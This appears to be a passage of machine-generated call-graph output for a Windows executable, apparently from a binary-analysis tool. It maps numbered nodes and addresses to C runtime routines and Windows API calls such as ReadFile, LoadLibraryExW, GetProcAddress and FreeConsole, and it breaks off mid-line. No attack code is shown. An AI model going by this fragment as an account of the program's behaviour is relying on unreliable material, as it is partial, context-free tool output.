fa0199 20978->20981 20980 f912d4 __strnicoll 14 API calls 20979->20980 20982 fa0191 20980->20982 20983 fa01a5 20981->20983 20984 f912d4 __strnicoll 14 API calls 20981->20984 20982->20942 20983->20942 20985 fa01c6 20984->20985 20986 f919bf __strnicoll 29 API calls 20985->20986 20986->20982 21006 fa33bc 20987->21006 20989 f956ff __strnicoll MultiByteToWideChar 20991 fa3379 20989->20991 20994 fa3382 GetLastError 20991->20994 20997 fa32ad 20991->20997 20992 fa3307 20998 fa32c1 20992->20998 20999 f9c0d2 31 API calls 20992->20999 20993 fa32f7 20995 f912d4 __strnicoll 14 API calls 20993->20995 20996 f912fa __dosmaperr 14 API calls 20994->20996 20995->20997 20996->20997 20997->20974 20998->20989 20999->20998 21001 fa3543 21000->21001 21002 fa35d9 ReadFile 21001->21002 21003 fa35d4 21001->21003 21002->21003 21004 fa35f6 21002->21004 21003->20974 21004->21003 21005 f9c0d2 31 API calls 21004->21005 21005->21003 21007 fa33f0 21006->21007 21008 fa3461 ReadFile 21007->21008 21009 fa327c 21007->21009 21008->21009 21010 fa347a 21008->21010 21009->20992 21009->20993 21009->20997 21009->20998 21010->21009 21011 f9c0d2 31 API calls 21010->21011 21011->21009 21012->20977 21015 f98ce5 21013->21015 21022 f98cf5 21013->21022 21014 f98d1a 21017 f98d2b 21014->21017 21018 f98d4e 21014->21018 21015->21014 21016 f8d580 _Fputc 39 API calls 21015->21016 21015->21022 21016->21014 21025 fa1cc2 21017->21025 21020 f98dca 21018->21020 21021 f98d76 21018->21021 21018->21022 21023 f956ff __strnicoll MultiByteToWideChar 21020->21023 21021->21022 21024 f956ff __strnicoll MultiByteToWideChar 21021->21024 21022->20838 21023->21022 21024->21022 21028 fa3e63 21025->21028 21029 fa3e91 _Fputc 21028->21029 21030 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21029->21030 21031 fa1cdd 21030->21031 21031->21022 21032->20823 21033->20737 21035 f9256f 21034->21035 21036 f92584 21034->21036 21037 f912d4 __strnicoll 14 API calls 21035->21037 21038 f92593 21036->21038 21040 f9de33 43 API calls 21036->21040 21039 f92574 21037->21039 21038->20744 21041 f919bf __strnicoll 29 API calls 21039->21041 21042 f92590 21040->21042 21043 f9257f 21041->21043 21042->20744 21043->20744 21047 f8d113 LeaveCriticalSection 21044->21047 21046 f92561 21046->20749 21047->21046 21049 f890a3 21048->21049 21050 f89013 21048->21050 21052 f85770 std::ios_base::_Init 30 API calls 21049->21052 21051 f85810 std::ios_base::_Init 5 API calls 21050->21051 21053 f89025 21051->21053 21054 f890a8 21052->21054 21055 f82ae0 std::ios_base::_Init 30 API calls 21053->21055 21057 f89030 codecvt 21055->21057 21056 f89071 codecvt 21056->20753 21057->21056 21058 f82310 std::ios_base::_Init 29 API calls 21057->21058 21058->21056 21059->20763 21061 f93972 21060->21061 21063 f939e2 21060->21063 21062 f98e04 _Ungetc 29 API calls 21061->21062 21067 f93978 21062->21067 21064 f93927 21063->21064 21065 f9f3cf _Ungetc 14 API calls 21063->21065 21071 f93952 21064->21071 21065->21064 21066 f939ca 21068 f912d4 __strnicoll 14 API calls 21066->21068 21067->21063 21067->21066 21069 f939cf 21068->21069 21070 f919bf __strnicoll 29 API calls 21069->21070 21070->21064 21074 f8d113 LeaveCriticalSection 21071->21074 21073 f93958 21073->20768 21074->21073 21075 f88950 21076 f88964 21075->21076 21077 f889bf 21076->21077 21078 f88bb5 69 API calls 21076->21078 21079 f8898f 21078->21079 21079->21077 21080 f889ac 21079->21080 21081 f91384 67 API calls 21079->21081 21080->21077 21083 f925aa 21080->21083 21081->21080 21084 f925ca 21083->21084 21085 f925b5 21083->21085 21087 f925d2 21084->21087 21088 f925e7 21084->21088 21086 f912d4 __strnicoll 14 API calls 21085->21086 21090 f925ba 21086->21090 21091 f912d4 __strnicoll 14 API calls 21087->21091 21097 f9c2f6 21088->21097 21093 f919bf __strnicoll 29 API calls 21090->21093 21094 f925d7 21091->21094 21092 f925e2 21092->21077 21096 f925c5 21093->21096 21095 f919bf __strnicoll 29 API calls 21094->21095 21095->21092 21096->21077 21098 f9c30a _Fputc 21097->21098 21101 f9c89f 21098->21101 21100 f9c316 _Fputc 21100->21092 21102 f9c8ab ___scrt_is_nonwritable_in_current_image 21101->21102 21103 f9c8b2 21102->21103 21104 f9c8d5 21102->21104 21105 f91b68 __strnicoll 29 API calls 21103->21105 21112 f8d0ff EnterCriticalSection 21104->21112 21107 f9c8cb 21105->21107 21107->21100 21108 f9c8e3 21113 f9c6fe 21108->21113 21110 f9c8f2 21126 f9c924 21110->21126 21112->21108 21114 f9c70d 21113->21114 21115 f9c735 21113->21115 21116 f91b68 __strnicoll 29 API calls 21114->21116 21117 f98e04 _Ungetc 29 API calls 21115->21117 21123 f9c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21116->21123 21118 f9c73e 21117->21118 21119 f9c130 33 API calls 21118->21119 21120 f9c75c 21119->21120 21121 f9c7e8 21120->21121 21120->21123 21124 f9c7ff 21120->21124 21122 f9c388 34 API calls 21121->21122 21122->21123 21123->21110 21124->21123 21125 f9c533 33 API calls 21124->21125 21125->21123 21129 f8d113 LeaveCriticalSection 21126->21129 21128 f9c92c 21128->21107 21129->21128 16618 f8a24d 16627 f899e0 GetModuleHandleW 16618->16627 16621 f8a259 16623 f8a264 16621->16623 16629 f8f174 16621->16629 16622 f8a28b 16632 f8f14f 16622->16632 16628 f899ec 16627->16628 16628->16621 16628->16622 16635 f8f284 16629->16635 16633 f8f284 CallUnexpected 21 API calls 16632->16633 16634 f8a293 16633->16634 16636 f8f2b1 16635->16636 16637 f8f2c3 16635->16637 16638 f899e0 CallUnexpected GetModuleHandleW 16636->16638 16653 f8f41e 16637->16653 16640 f8f2b6 16638->16640 16640->16637 16647 f8f1b8 GetModuleHandleExW 16640->16647 16642 f8f17f 16642->16623 16648 f8f218 16647->16648 16649 f8f1f7 GetProcAddress 16647->16649 16651 f8f21e FreeLibrary 16648->16651 16652 f8f227 16648->16652 16649->16648 16650 f8f20b 16649->16650 16650->16648 16651->16652 16652->16637 16654 f8f42a ___scrt_is_nonwritable_in_current_image 16653->16654 16668 f91cd1 EnterCriticalSection 16654->16668 16656 f8f434 16669 f8f31b 16656->16669 16658 f8f441 16673 f8f45f 16658->16673 16661 f8f253 16730 f8f23a 16661->16730 16663 f8f25d 16664 f8f271 16663->16664 16665 f8f261 GetCurrentProcess TerminateProcess 16663->16665 16666 f8f1b8 CallUnexpected 3 API calls 16664->16666 16665->16664 16667 f8f279 ExitProcess 16666->16667 16668->16656 16670 f8f327 ___scrt_is_nonwritable_in_current_image CallUnexpected 16669->16670 16672 f8f38b CallUnexpected 16670->16672 16676 f90fee 16670->16676 16672->16658 16729 f91ce8 LeaveCriticalSection 16673->16729 16675 f8f2fa 16675->16642 16675->16661 16677 f90ffa __EH_prolog3 16676->16677 16680 f91279 16677->16680 16679 f91021 std::ios_base::_Init 16679->16672 16681 f91285 ___scrt_is_nonwritable_in_current_image 16680->16681 16688 f91cd1 EnterCriticalSection 16681->16688 16683 f91293 16689 f91144 16683->16689 16688->16683 16690 f91163 16689->16690 16691 f9115b 16689->16691 16690->16691 16696 f95677 16690->16696 16693 f912c8 16691->16693 16728 f91ce8 LeaveCriticalSection 16693->16728 16695 f912b1 16695->16679 16697 f95682 RtlFreeHeap 16696->16697 16701 f956ac 16696->16701 16698 f95697 GetLastError 16697->16698 16697->16701 16699 f956a4 __dosmaperr 16698->16699 16702 f912d4 16699->16702 16701->16691 16705 f95a5b GetLastError 16702->16705 16704 f912d9 16704->16701 16706 f95a71 16705->16706 16709 f95a77 16705->16709 16707 f96334 __strnicoll 6 API calls 16706->16707 16707->16709 16708 f96373 __strnicoll 6 API calls 16710 f95a93 16708->16710 16709->16708 16726 f95a7b SetLastError 16709->16726 16712 f969b4 __strnicoll 12 API calls 16710->16712 16710->16726 16713 f95aa8 16712->16713 16714 f95ac1 16713->16714 16715 f95ab0 16713->16715 16717 f96373 __strnicoll 6 API calls 16714->16717 16716 f96373 __strnicoll 6 API calls 16715->16716 16718 f95abe 16716->16718 16719 f95acd 16717->16719 16724 f95677 ___free_lconv_mon 12 API calls 16718->16724 16720 f95ae8 16719->16720 16721 f95ad1 16719->16721 16722 f95c1c __strnicoll 12 API calls 16720->16722 16723 f96373 __strnicoll 6 API calls 16721->16723 16725 f95af3 16722->16725 16723->16718 16724->16726 16727 f95677 ___free_lconv_mon 12 API calls 16725->16727 16726->16704 16727->16726 16728->16695 16729->16675 16733 f98f0a 16730->16733 16732 f8f23f CallUnexpected 16732->16663 16734 f98f19 CallUnexpected 16733->16734 16735 f98f26 16734->16735 16737 f96580 16734->16737 16735->16732 16740 f966cd 16737->16740 16741 f966fd 16740->16741 16744 f9659c 16740->16744 16741->16744 16747 f96602 16741->16747 16744->16735 16745 f96717 GetProcAddress 16745->16744 16746 f96727 std::_Locinfo::_Locinfo_dtor 16745->16746 16746->16744 16753 f96613 ___vcrt_FlsFree 16747->16753 16748 f966a9 16748->16744 16748->16745 16749 f96631 LoadLibraryExW 16750 f9664c GetLastError 16749->16750 16751 f966b0 16749->16751 16750->16753 16751->16748 16752 f966c2 FreeLibrary 16751->16752 16752->16748 16753->16748 16753->16749 16754 f9667f LoadLibraryExW 16753->16754 16754->16751 16754->16753 19806 f88a20 19807 f88a42 19806->19807 19811 f88a57 19806->19811 19812 f88bb5 19807->19812 19813 f88bd0 19812->19813 19816 f88c21 19812->19816 19813->19816 19817 f92a74 69 API calls 19813->19817 19814 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19815 f88a47 19814->19815 19815->19811 19818 f92a39 19815->19818 19816->19814 19817->19816 19819 f92a59 19818->19819 19820 f92a44 19818->19820 19819->19820 19821 f92a60 19819->19821 19822 f912d4 __strnicoll 14 API calls 19820->19822 19828 f91384 19821->19828 19823 f92a49 19822->19823 19825 f919bf __strnicoll 29 API calls 19823->19825 19827 f92a54 19825->19827 19826 f92a6f 19826->19811 19827->19811 19829 f91397 _Fputc 19828->19829 19832 f915fd 19829->19832 19831 f913ac _Fputc 19831->19826 19834 f91609 ___scrt_is_nonwritable_in_current_image 19832->19834 19833 f9160f 19835 f91b68 __strnicoll 29 API calls 19833->19835 19834->19833 19837 f91652 19834->19837 19836 f9162a 19835->19836 19836->19831 19843 f8d0ff EnterCriticalSection 19837->19843 19839 f9165e 19844 f91511 19839->19844 19841 f91674 19855 f9169d 19841->19855 19843->19839 19845 f91524 19844->19845 19846 f91537 19844->19846 19845->19841 19858 f91438 19846->19858 19848 f9155a 19849 f915e8 19848->19849 19850 f91575 19848->19850 19862 f9c32c 19848->19862 19849->19841 19851 f921a8 ___scrt_uninitialize_crt 64 API calls 19850->19851 19853 f91588 19851->19853 19876 f9c112 19853->19876 19927 f8d113 LeaveCriticalSection 19855->19927 19857 f916a5 19857->19836 19859 f91449 19858->19859 19861 f914a1 19858->19861 19859->19861 19879 f9c0d2 19859->19879 19861->19848 19863 f9c6fe 19862->19863 19864 f9c70d 19863->19864 19865 f9c735 19863->19865 19866 f91b68 __strnicoll 29 API calls 19864->19866 19867 f98e04 _Ungetc 29 API calls 19865->19867 19873 f9c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19866->19873 19868 f9c73e 19867->19868 19889 f9c130 19868->19889 19871 f9c7e8 19892 f9c388 19871->19892 19873->19850 19874 f9c7ff 19874->19873 19904 f9c533 19874->19904 19877 f9c273 _Fputc 31 API calls 19876->19877 19878 f9c12b 19877->19878 19878->19849 19880 f9c0e6 _Fputc 19879->19880 19883 f9c273 19880->19883 19882 f9c0fb _Fputc 19882->19861 19884 f9cd8f _Fputc 29 API calls 19883->19884 19885 f9c285 19884->19885 19886 f9c2a1 SetFilePointerEx 19885->19886 19888 f9c28d _Fputc 19885->19888 19887 f9c2b9 GetLastError 19886->19887 19886->19888 19887->19888 19888->19882 19911 f9c14e 19889->19911 19893 f9c397 _Fputc 19892->19893 19894 f98e04 _Ungetc 29 API calls 19893->19894 19896 f9c3b3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19894->19896 19895 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19897 f9c531 19895->19897 19898 f9c130 33 API calls 19896->19898 19903 f9c3bf 19896->19903 19897->19873 19899 f9c413 19898->19899 19900 f9c445 ReadFile 19899->19900 19899->19903 19901 f9c46c 19900->19901 19900->19903 19902 f9c130 33 API calls 19901->19902 19902->19903 19903->19895 19905 f98e04 _Ungetc 29 API calls 19904->19905 19906 f9c546 19905->19906 19907 f9c130 33 API calls 19906->19907 19910 f9c590 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19906->19910 19908 f9c5ed 19907->19908 19909 f9c130 33 API calls 19908->19909 19908->19910 19909->19910 19910->19873 19912 f9c15a ___scrt_is_nonwritable_in_current_image 19911->19912 19913 f9c19d 19912->19913 19915 f9c1e3 19912->19915 19921 f9c149 19912->19921 19914 f91b68 __strnicoll 29 API calls 19913->19914 19914->19921 19922 f9cfd8 EnterCriticalSection 19915->19922 19917 f9c1e9 19918 f9c20a 19917->19918 19919 f9c273 _Fputc 31 API calls 19917->19919 19923 f9c26b 19918->19923 19919->19918 19921->19871 19921->19873 19921->19874 19922->19917 19926 f9cffb LeaveCriticalSection 19923->19926 19925 f9c271 19925->19921 19926->19925 19927->19857 21304 f88b10 21305 f88b19 21304->21305 21306 f88b4e 21304->21306 21305->21306 21309 f920e7 21305->21309 21308 f88b41 21310 f920f9 21309->21310 21314 f92102 ___scrt_uninitialize_crt 21309->21314 21311 f92265 ___scrt_uninitialize_crt 68 API calls 21310->21311 21312 f920ff 21311->21312 21312->21308 21313 f92111 21313->21308 21314->21313 21317 f923ea 21314->21317 21318 f923f6 ___scrt_is_nonwritable_in_current_image 21317->21318 21325 f8d0ff EnterCriticalSection 21318->21325 21320 f92404 21321 f92143 ___scrt_uninitialize_crt 68 API calls 21320->21321 21322 f92415 21321->21322 21326 f9243e 21322->21326 21325->21320 21329 f8d113 LeaveCriticalSection 21326->21329 21328 f92138 21328->21308 21329->21328 16764 f8a112 16765 f8a11e ___scrt_is_nonwritable_in_current_image 16764->16765 16790 f8737a 16765->16790 16767 f8a125 16768 f8a27e 16767->16768 16778 f8a14f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16767->16778 16826 f89a33 IsProcessorFeaturePresent 16768->16826 16770 f8a285 16808 f8f139 16770->16808 16773 f8f14f CallUnexpected 21 API calls 16774 f8a293 16773->16774 16775 f8a16e 16776 f8a1ef 16801 f916ac 16776->16801 16778->16775 16778->16776 16811 f8f183 16778->16811 16780 f8a1f5 16805 f820c0 FreeConsole 16780->16805 16783 f899e0 CallUnexpected GetModuleHandleW 16784 f8a216 16783->16784 16784->16770 16785 f8a21a 16784->16785 16786 f8a223 16785->16786 16817 f8f165 16785->16817 16820 f873b3 16786->16820 16791 f87383 16790->16791 16830 f8969b IsProcessorFeaturePresent 16791->16830 16795 f87394 16796 f87398 16795->16796 16840 f8d060 16795->16840 16796->16767 16799 f873af 16799->16767 16802 f916ba 16801->16802 16803 f916b5 16801->16803 16802->16780 16912 f917d5 16803->16912 17779 f820b0 16805->17779 16809 f8f284 CallUnexpected 21 API calls 16808->16809 16810 f8a28b 16809->16810 16810->16773 16812 f8f199 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_dtor 16811->16812 16812->16776 16813 f9590a __Getctype 39 API calls 16812->16813 16816 f938bc 16813->16816 16814 f91f43 CallUnexpected 39 API calls 16815 f938e6 16814->16815 16816->16814 16818 f8f284 CallUnexpected 21 API calls 16817->16818 16819 f8f170 16818->16819 16819->16786 16821 f873bf 16820->16821 16822 f873d5 16821->16822 18190 f8d072 16821->18190 16822->16775 16824 f873cd 16825 f8ab0e ___scrt_uninitialize_crt 7 API calls 16824->16825 16825->16822 16827 f89a49 std::invalid_argument::invalid_argument CallUnexpected 16826->16827 16828 f89af4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16827->16828 16829 f89b38 CallUnexpected 16828->16829 16829->16770 16831 f8738f 16830->16831 16832 f8aaef 16831->16832 16849 f95346 16832->16849 16835 f8aaf8 16835->16795 16837 f8ab00 16838 f8ab0b 16837->16838 16863 f95382 16837->16863 16838->16795 16903 f979e9 16840->16903 16843 f8ab0e 16844 f8ab21 16843->16844 16845 f8ab17 16843->16845 16844->16796 16846 f94404 ___vcrt_uninitialize_ptd 6 API calls 16845->16846 16847 f8ab1c 16846->16847 16848 f95382 ___vcrt_uninitialize_locks DeleteCriticalSection 16847->16848 16848->16844 16850 f9534f 16849->16850 16852 f95378 16850->16852 16853 f8aaf4 16850->16853 16867 f9f629 16850->16867 16854 f95382 ___vcrt_uninitialize_locks DeleteCriticalSection 16852->16854 16853->16835 16855 f943d1 16853->16855 16854->16853 16884 f9f53a 16855->16884 16860 f94401 16860->16837 16862 f943e6 16862->16837 16864 f953ac 16863->16864 16865 f9538d 16863->16865 16864->16835 16866 f95397 DeleteCriticalSection 16865->16866 16866->16864 16866->16866 16872 f9f6bb 16867->16872 16870 f9f661 InitializeCriticalSectionAndSpinCount 16871 f9f64c 16870->16871 16871->16850 16873 f9f643 16872->16873 16874 f9f6dc 16872->16874 16873->16870 16873->16871 16874->16873 16875 f9f744 GetProcAddress 16874->16875 16877 f9f735 16874->16877 16879 f9f670 LoadLibraryExW 16874->16879 16875->16873 16877->16875 16878 f9f73d FreeLibrary 16877->16878 16878->16875 16880 f9f6b7 16879->16880 16881 f9f687 GetLastError 16879->16881 16880->16874 16881->16880 16882 f9f692 ___vcrt_FlsFree 16881->16882 16882->16880 16883 f9f6a8 LoadLibraryExW 16882->16883 16883->16874 16885 f9f6bb ___vcrt_FlsFree 5 API calls 16884->16885 16886 f9f554 16885->16886 16887 f9f56d TlsAlloc 16886->16887 16888 f943db 16886->16888 16888->16862 16889 f9f5eb 16888->16889 16890 f9f6bb ___vcrt_FlsFree 5 API calls 16889->16890 16891 f9f605 16890->16891 16892 f9f620 TlsSetValue 16891->16892 16893 f943f4 16891->16893 16892->16893 16893->16860 16894 f94404 16893->16894 16895 f9440e 16894->16895 16897 f94414 16894->16897 16898 f9f575 16895->16898 16897->16862 16899 f9f6bb ___vcrt_FlsFree 5 API calls 16898->16899 16900 f9f58f 16899->16900 16901 f9f5a7 TlsFree 16900->16901 16902 f9f59b 16900->16902 16901->16902 16902->16897 16904 f979f9 16903->16904 16905 f873a1 16903->16905 16904->16905 16907 f97152 16904->16907 16905->16799 16905->16843 16908 f97159 16907->16908 16909 f9719c GetStdHandle 16908->16909 16910 f971fe 16908->16910 16911 f971af GetFileType 16908->16911 16909->16908 16910->16904 16911->16908 16913 f917de 16912->16913 16916 f917f4 16912->16916 16913->16916 16918 f91716 16913->16918 16915 f917eb 16915->16916 16935 f918e3 16915->16935 16916->16802 16919 f9171f 16918->16919 16920 f91722 16918->16920 16919->16915 16944 f97220 16920->16944 16925 f9173f 16971 f91801 16925->16971 16926 f91733 16927 f95677 ___free_lconv_mon 14 API calls 16926->16927 16929 f91739 16927->16929 16929->16915 16931 f95677 ___free_lconv_mon 14 API calls 16932 f91763 16931->16932 16933 f95677 ___free_lconv_mon 14 API calls 16932->16933 16934 f91769 16933->16934 16934->16915 16936 f91954 16935->16936 16941 f918f2 16935->16941 16936->16916 16937 f969b4 __strnicoll 14 API calls 16937->16941 16938 f91958 16940 f95677 ___free_lconv_mon 14 API calls 16938->16940 16939 f957c1 WideCharToMultiByte _Fputc 16939->16941 16940->16936 16941->16936 16941->16937 16941->16938 16941->16939 16943 f95677 ___free_lconv_mon 14 API calls 16941->16943 17498 f9ca05 16941->17498 16943->16941 16945 f97229 16944->16945 16946 f91728 16944->16946 16993 f959c5 16945->16993 16950 f9c92e GetEnvironmentStringsW 16946->16950 16951 f9c946 16950->16951 16964 f9172d 16950->16964 16952 f957c1 _Fputc WideCharToMultiByte 16951->16952 16953 f9c963 16952->16953 16954 f9c978 16953->16954 16955 f9c96d FreeEnvironmentStringsW 16953->16955 16956 f956b1 __strnicoll 15 API calls 16954->16956 16955->16964 16957 f9c97f 16956->16957 16958 f9c998 16957->16958 16959 f9c987 16957->16959 16961 f957c1 _Fputc WideCharToMultiByte 16958->16961 16960 f95677 ___free_lconv_mon 14 API calls 16959->16960 16962 f9c98c FreeEnvironmentStringsW 16960->16962 16963 f9c9a8 16961->16963 16962->16964 16965 f9c9af 16963->16965 16966 f9c9b7 16963->16966 16964->16925 16964->16926 16968 f95677 ___free_lconv_mon 14 API calls 16965->16968 16967 f95677 ___free_lconv_mon 14 API calls 16966->16967 16969 f9c9b5 FreeEnvironmentStringsW 16967->16969 16968->16969 16969->16964 16972 f91816 16971->16972 16973 f969b4 __strnicoll 14 API calls 16972->16973 16974 f9183d 16973->16974 16975 f91845 16974->16975 16981 f9184f 16974->16981 16976 f95677 ___free_lconv_mon 14 API calls 16975->16976 16978 f91746 16976->16978 16977 f918ac 16979 f95677 ___free_lconv_mon 14 API calls 16977->16979 16978->16931 16979->16978 16980 f969b4 __strnicoll 14 API calls 16980->16981 16981->16977 16981->16980 16982 f918bb 16981->16982 16987 f918d6 16981->16987 16989 f95677 ___free_lconv_mon 14 API calls 16981->16989 17479 f952ec 16981->17479 17488 f917a6 16982->17488 16986 f95677 ___free_lconv_mon 14 API calls 16988 f918c8 16986->16988 17494 f919ec IsProcessorFeaturePresent 16987->17494 16991 f95677 ___free_lconv_mon 14 API calls 16988->16991 16989->16981 16991->16978 16992 f918e2 16994 f959d6 16993->16994 16995 f959d0 16993->16995 16999 f959dc 16994->16999 17048 f96373 16994->17048 17043 f96334 16995->17043 17001 f959e1 16999->17001 17065 f91f43 16999->17065 17000 f959f4 17053 f969b4 17000->17053 17021 f975e1 17001->17021 17006 f95a08 17009 f96373 __strnicoll 6 API calls 17006->17009 17007 f95a1d 17008 f96373 __strnicoll 6 API calls 17007->17008 17010 f95a29 17008->17010 17011 f95a14 17009->17011 17012 f95a2d 17010->17012 17013 f95a3c 17010->17013 17014 f95677 ___free_lconv_mon 14 API calls 17011->17014 17015 f96373 __strnicoll 6 API calls 17012->17015 17060 f95c1c 17013->17060 17017 f95a1a 17014->17017 17015->17011 17017->16999 17019 f95677 ___free_lconv_mon 14 API calls 17020 f95a4e 17019->17020 17020->17001 17022 f9760b 17021->17022 17297 f9746d 17022->17297 17027 f9764b 17311 f97268 17027->17311 17028 f9763d 17029 f95677 ___free_lconv_mon 14 API calls 17028->17029 17032 f97624 17029->17032 17032->16946 17033 f97683 17034 f912d4 __strnicoll 14 API calls 17033->17034 17035 f97688 17034->17035 17037 f95677 ___free_lconv_mon 14 API calls 17035->17037 17036 f976ca 17039 f97713 17036->17039 17322 f9799c 17036->17322 17037->17032 17038 f9769e 17038->17036 17041 f95677 ___free_lconv_mon 14 API calls 17038->17041 17040 f95677 ___free_lconv_mon 14 API calls 17039->17040 17040->17032 17041->17036 17044 f966cd std::_Locinfo::_Locinfo_dtor 5 API calls 17043->17044 17045 f96350 17044->17045 17046 f9636b TlsGetValue 17045->17046 17047 f96359 17045->17047 17047->16994 17049 f966cd std::_Locinfo::_Locinfo_dtor 5 API calls 17048->17049 17050 f9638f 17049->17050 17051 f959f0 17050->17051 17052 f963ad TlsSetValue 17050->17052 17051->16999 17051->17000 17059 f969c1 __strnicoll 17053->17059 17054 f96a01 17056 f912d4 __strnicoll 13 API calls 17054->17056 17055 f969ec HeapAlloc 17057 f95a00 17055->17057 17055->17059 17056->17057 17057->17006 17057->17007 17059->17054 17059->17055 17076 f8f46b 17059->17076 17090 f95d82 17060->17090 17192 f97aa0 17065->17192 17069 f91f5d IsProcessorFeaturePresent 17073 f91f69 17069->17073 17070 f91f7c 17071 f8f14f CallUnexpected 21 API calls 17070->17071 17075 f91f86 17071->17075 17072 f91f53 17072->17069 17072->17070 17222 f91a20 17073->17222 17079 f8f4a6 17076->17079 17080 f8f4b2 ___scrt_is_nonwritable_in_current_image 17079->17080 17085 f91cd1 EnterCriticalSection 17080->17085 17082 f8f4bd CallUnexpected 17086 f8f4f4 17082->17086 17085->17082 17089 f91ce8 LeaveCriticalSection 17086->17089 17088 f8f476 17088->17059 17089->17088 17091 f95d8e ___scrt_is_nonwritable_in_current_image 17090->17091 17104 f91cd1 EnterCriticalSection 17091->17104 17093 f95d98 17105 f95dc8 17093->17105 17096 f95dd4 17097 f95de0 ___scrt_is_nonwritable_in_current_image 17096->17097 17109 f91cd1 EnterCriticalSection 17097->17109 17099 f95dea 17110 f95bd1 17099->17110 17101 f95e02 17114 f95e22 17101->17114 17104->17093 17108 f91ce8 LeaveCriticalSection 17105->17108 17107 f95c8a 17107->17096 17108->17107 17109->17099 17111 f95c07 __Getctype 17110->17111 17112 f95be0 __Getctype 17110->17112 17111->17101 17112->17111 17117 f99e4a 17112->17117 17191 f91ce8 LeaveCriticalSection 17114->17191 17116 f95a47 17116->17019 17118 f99eca 17117->17118 17121 f99e60 17117->17121 17120 f95677 ___free_lconv_mon 14 API calls 17118->17120 17143 f99f18 17118->17143 17122 f99eec 17120->17122 17121->17118 17125 f99e93 17121->17125 17127 f95677 ___free_lconv_mon 14 API calls 17121->17127 17123 f95677 ___free_lconv_mon 14 API calls 17122->17123 17124 f99eff 17123->17124 17129 f95677 ___free_lconv_mon 14 API calls 17124->17129 17130 f95677 ___free_lconv_mon 14 API calls 17125->17130 17144 f99eb5 17125->17144 17126 f95677 ___free_lconv_mon 14 API calls 17131 f99ebf 17126->17131 17133 f99e88 17127->17133 17128 f99f26 17132 f99f86 17128->17132 17141 f95677 14 API calls ___free_lconv_mon 17128->17141 17135 f99f0d 17129->17135 17136 f99eaa 17130->17136 17137 f95677 ___free_lconv_mon 14 API calls 17131->17137 17138 f95677 ___free_lconv_mon 14 API calls 17132->17138 17145 f992a1 17133->17145 17139 f95677 ___free_lconv_mon 14 API calls 17135->17139 17173 f995bd 17136->17173 17137->17118 17142 f99f8c 17138->17142 17139->17143 17141->17128 17142->17111 17185 f99fe4 17143->17185 17144->17126 17146 f992b2 17145->17146 17172 f9939b 17145->17172 17147 f992c3 17146->17147 17148 f95677 ___free_lconv_mon 14 API calls 17146->17148 17149 f992d5 17147->17149 17150 f95677 ___free_lconv_mon 14 API calls 17147->17150 17148->17147 17151 f992e7 17149->17151 17152 f95677 ___free_lconv_mon 14 API calls 17149->17152 17150->17149 17153 f95677 ___free_lconv_mon 14 API calls 17151->17153 17155 f992f9 17151->17155 17152->17151 17153->17155 17154 f95677 ___free_lconv_mon 14 API calls 17156 f9930b 17154->17156 17155->17154 17155->17156 17157 f95677 ___free_lconv_mon 14 API calls 17156->17157 17158 f9931d 17156->17158 17157->17158 17159 f9932f 17158->17159 17160 f95677 ___free_lconv_mon 14 API calls 17158->17160 17161 f99341 17159->17161 17163 f95677 ___free_lconv_mon 14 API calls 17159->17163 17160->17159 17162 f99353 17161->17162 17164 f95677 ___free_lconv_mon 14 API calls 17161->17164 17163->17161 17164->17162 17172->17125 17174 f995ca 17173->17174 17184 f99622 17173->17184 17175 f995da 17174->17175 17177 f95677 ___free_lconv_mon 14 API calls 17174->17177 17176 f995ec 17175->17176 17178 f95677 ___free_lconv_mon 14 API calls 17175->17178 17179 f95677 ___free_lconv_mon 14 API calls 17176->17179 17180 f995fe 17176->17180 17177->17175 17178->17176 17179->17180 17181 f99610 17180->17181 17182 f95677 ___free_lconv_mon 14 API calls 17180->17182 17183 f95677 ___free_lconv_mon 14 API calls 17181->17183 17181->17184 17182->17181 17183->17184 17184->17144 17186 f99ff1 17185->17186 17190 f9a010 17185->17190 17187 f996ab __Getctype 14 API calls 17186->17187 17186->17190 17188 f9a00a 17187->17188 17189 f95677 ___free_lconv_mon 14 API calls 17188->17189 17189->17190 17190->17128 17191->17116 17228 f97d23 17192->17228 17195 f97ac7 17196 f97ad3 ___scrt_is_nonwritable_in_current_image 17195->17196 17197 f95a5b __strnicoll 14 API calls 17196->17197 17198 f97b23 17196->17198 17199 f97b35 CallUnexpected 17196->17199 17205 f97b04 CallUnexpected 17196->17205 17197->17205 17200 f912d4 __strnicoll 14 API calls 17198->17200 17202 f97b6b CallUnexpected 17199->17202 17242 f91cd1 EnterCriticalSection 17199->17242 17201 f97b28 17200->17201 17239 f919bf 17201->17239 17207 f97ba8 17202->17207 17208 f97ca5 17202->17208 17218 f97bd6 17202->17218 17205->17198 17205->17199 17221 f97b0d 17205->17221 17207->17218 17243 f9590a GetLastError 17207->17243 17210 f97cb0 17208->17210 17274 f91ce8 LeaveCriticalSection 17208->17274 17211 f8f14f CallUnexpected 21 API calls 17210->17211 17213 f97cb8 17211->17213 17215 f9590a __Getctype 39 API calls 17219 f97c2b 17215->17219 17217 f9590a __Getctype 39 API calls 17217->17218 17270 f97c51 17218->17270 17220 f9590a __Getctype 39 API calls 17219->17220 17219->17221 17220->17221 17221->17072 17223 f91a3c std::invalid_argument::invalid_argument CallUnexpected 17222->17223 17224 f91a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17223->17224 17227 f91b39 CallUnexpected 17224->17227 17226 f91b57 17226->17070 17289 f87191 17227->17289 17229 f97d2f ___scrt_is_nonwritable_in_current_image 17228->17229 17234 f91cd1 EnterCriticalSection 17229->17234 17231 f97d3d 17235 f97d7f 17231->17235 17234->17231 17238 f91ce8 LeaveCriticalSection 17235->17238 17237 f91f48 17237->17072 17237->17195 17238->17237 17275 f91c0e 17239->17275 17241 f919cb 17241->17221 17242->17202 17244 f95926 17243->17244 17245 f95920 17243->17245 17247 f96373 __strnicoll 6 